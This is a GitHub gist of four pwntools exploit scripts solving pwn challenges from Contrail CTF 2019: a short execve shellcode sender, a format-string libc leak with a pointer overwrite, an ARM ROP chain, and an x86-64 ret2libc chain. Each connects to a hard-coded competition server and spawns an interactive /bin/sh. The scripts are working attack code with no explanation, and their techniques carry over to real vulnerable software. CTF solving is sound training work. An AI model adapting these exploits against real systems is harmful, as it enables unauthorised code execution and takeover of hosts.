Last active
September 6, 2023 03:13
-
-
Save lmt-swallow/f01ae93703e5904780255ecc29180fe1 to your computer and use it in GitHub Desktop.
Contrail CTF 2019 (pokebattle, welcomechain, EasyShellcode, RaspiWorld)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
from pwn import * | |
context.update(arch='amd64', os='linux') | |
host = '114.177.250.4' | |
port = 2210 | |
s = remote(host, port) | |
shellcode = asm(""" | |
mov rdi, [rax] | |
lea eax, [ebp + 0x3b] | |
add rdi, 13 | |
syscall | |
""") + "/bin/sh" | |
print(disasm(shellcode)) | |
print(len(shellcode)) | |
assert len(shellcode) <= 0x14 | |
s.send(shellcode) | |
s.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
from pwn import * | |
context.update(arch='amd64', os='linux') | |
host = '114.177.250.4' | |
port = 2225 | |
s = remote(host, port) | |
def pokeball(slot, name): | |
s.recvuntil('> ') | |
s.sendline('2') | |
s.recvuntil('slot : ') | |
s.sendline(str(slot)) | |
s.recvuntil('name : ') | |
s.send(name) | |
def fight(): | |
s.recvuntil('> ') | |
s.sendline('1') | |
# leak libc_base | |
printf_plt = 0x47b0 # 1/16 | |
fmt_string = "%75$p\n\x00" | |
pokeball(0, fmt_string + 'A' * (40 - len(fmt_string)) + p16(printf_plt)) | |
fight() | |
libc_start_main = int(s.recvline(), 16) - 231 | |
libc_system = libc_start_main + (0x000000000004f440 - 0x0000000000021ab0) | |
print("libc_start_main: {}".format(hex(libc_start_main))) | |
# system("/bin/sh") | |
cmd = "/bin/sh\x00" | |
pokeball(0, cmd + 'A' * (40 - len(cmd)) + p64(libc_system)) | |
fight() | |
s.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
from pwn import * | |
context.binary = './0.elf' | |
host = '114.177.250.4' | |
port = 7777 | |
s = remote(host, port) | |
_io_puts = 0x17148 | |
vuln = 0x104cc | |
# r0 = "/bin/sh", r1 = NULL, r2 = NULL, r7=11 | |
rop_chain = "A" * 0x40 | |
rop_chain += "A" * 4 # dummy fp | |
# first ret addr | |
rop_chain += p32(0x1acc0) # 0x0001acc0 : pop {r4, r6, r7, pc} | |
# stack for 1acc0 | |
rop_chain += "A" * 4 # r4 | |
rop_chain += p32(0x5c46c) # 0x0005c46c : mov r0, r2 ; pop {r4, r5, r6, r7, r8, sb, sl, pc} | |
rop_chain += "A" * 4 | |
rop_chain += p32(0x65d54) # 0x00065d54 : add r2, sp, #0x24 ; add r1, sp, #0x28 ; blx r6 | |
# stack for 65d54 | |
# nope | |
# stack for 0x5c46c | |
rop_chain += "A" * 4 # r4 | |
rop_chain += "A" * 4 # r5 | |
rop_chain += "A" * 4 # r6 | |
rop_chain += p32(11) # r7 | |
rop_chain += "A" * 4 # r8 | |
rop_chain += "A" * 4 # sb | |
rop_chain += "A" * 4 # sl | |
rop_chain += p32(0x10c18) #0x00010c18 : pop {r4, r5, r6, pc} | |
# stack for 0x10c18 (& r0) | |
rop_chain += "A" * 4 # r4 | |
rop_chain += "/bin" # r5 | |
rop_chain += "/sh\x00" # r6 | |
rop_chain += p32(0x6d108) # 0x0006d108 : pop {r1, pc} | |
# stack for 6d108 | |
rop_chain += p32(0x00) | |
rop_chain += p32(0x10160) # 0x00010160 : pop {r3, pc} | |
# stack for 10160 | |
rop_chain += p32(0x6d078) # 0x0006d078 : pop {r2, r3} ; bx lr | |
rop_chain += p32(0x22e80) # 0x00022e80 : pop {lr} ; bx r3 | |
# stack for 22e80 | |
rop_chain += p32(0x1d8c8) # 0x0001d8c8 : svc #0 ; pop {r7} ; bx lr | |
#rop_chain += p32(vuln) | |
# stack for 6d078 | |
rop_chain += p32(0x00) | |
rop_chain += p32(0x00) | |
# stack for 0x1d8c8 | |
rop_chain += p32(0x00) | |
s.recvuntil("Welcome to Raspi World\n") | |
s.sendline(rop_chain) | |
s.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
from pwn import * | |
context.update(arch='amd64', os='linux') | |
host = '114.177.250.4' | |
port = 2226 | |
s = remote(host, port) | |
welcome_addr = 0x400740 | |
puts_plt = 0x4005a0 | |
printf_got = 0x601030 | |
pop_rdi = 0x400853 | |
ret = 0x00400576 | |
# call puts to leak libc base | |
rop_chain = "A" * 0x28 | |
rop_chain += p64(pop_rdi) | |
rop_chain += p64(printf_got) | |
rop_chain += p64(puts_plt) | |
rop_chain += p64(welcome_addr) | |
s.recvuntil(": ") | |
s.sendline(rop_chain) | |
s.recvline() | |
libc_printf = u64(s.recv(6) + '\x00\x00') | |
libc_base = libc_printf - 0x64e80 | |
print("[+] got libc_base: {}".format(hex(libc_base))) | |
# system("/bin/sh") | |
libc_system = libc_base + 0x4f440 | |
libc_puts = libc_base + 0x809c0 | |
libc_binsh = libc_base + 0x1b3e9a | |
rop_chain = "A" * 0x28 | |
rop_chain += p64(pop_rdi) | |
rop_chain += p64(libc_binsh) | |
rop_chain += p64(ret) | |
rop_chain += p64(libc_system) | |
s.recvuntil(": ") | |
s.sendline(rop_chain) | |
s.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment